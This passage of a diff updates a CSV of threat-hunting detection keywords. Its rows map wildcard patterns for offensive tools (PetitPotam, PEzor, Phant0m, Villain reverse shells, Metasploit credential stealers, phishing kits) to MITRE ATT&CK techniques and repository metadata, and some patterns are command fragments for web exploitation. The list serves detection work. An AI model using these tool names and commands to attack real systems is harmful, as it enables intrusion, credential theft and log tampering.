tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" 
+"*PetitPotam.sln*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.vcxproj*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*petitpotam_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*petitpotam_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*PetitPotamModified.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*PEzor generated 
Beacon Object File*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*PEzor*/Inject.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" 
@@ -14722,11 +14888,11 @@ "*PEzor.sh *.bin*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*PEzor/*/bof.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*PEzor/*syscalls.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*pfsense*reverse_root_shell_csrf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*pfx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pgpdisk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pgpsda2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pgpwde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pfsense*reverse_root_shell_csrf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*pfx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpdisk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpsda2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpwde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Phant0m scm 1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m scm 2*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m wmi*","offensive_tool_keyword","Phant0m","Windows Event Log 
Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" 
@@ -14736,33 +14902,33 @@ "*Phant0m-master.zip*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phant0m-rdll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phantom_thread * shc *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*PhantomService.csproj*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*PhantomService.exe*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*phish_test.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 
- T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*phish_windows_credentials.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*PhantomService.csproj*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*PhantomService.exe*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*phish_test.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*phish_windows_credentials.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Phish-Creds.ps1*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*phishery*","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1210 - T1565 - T1564.001","TA0002 - TA0007 - TA0010","N/A","N/A","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","10","947","208","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z" "*phishing-HTML-linter.*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" -"*phishlets *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" 
-"*phising_attack.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*phishlets *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*phising_attack.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*phoneinfoga scan -n *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PhoneInfoga*","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","10630","3054","2023-10-02T04:05:36Z","2018-10-25T09:19:47Z" +"*PhoneInfoga*","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","10632","3055","2023-10-02T04:05:36Z","2018-10-25T09:19:47Z" "*photon.py 
-u * -l 3 -t 100 --wayback*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*php -f *.php -- -o myShell.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2248","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*php -f *.php -- -o myShell.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*php_filter_chain_generator --chain *php system*'cmd']*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*php_passthru_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*php_popen_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*php_proc_open_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_passthru_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_popen_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_proc_open_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*PHP-Code-injection.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*PHP-Code-Injections-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*phpggc -l*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*phpggc monolog/rce1 assert 'phpinfo()'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*phpggc symfony/rce1 id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*phpmyadmin_credsteal.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*PhpSploit*","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2024","451","2023-08-23T13:08:08Z","2014-05-21T19:43:03Z" +"*phpmyadmin_credsteal.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
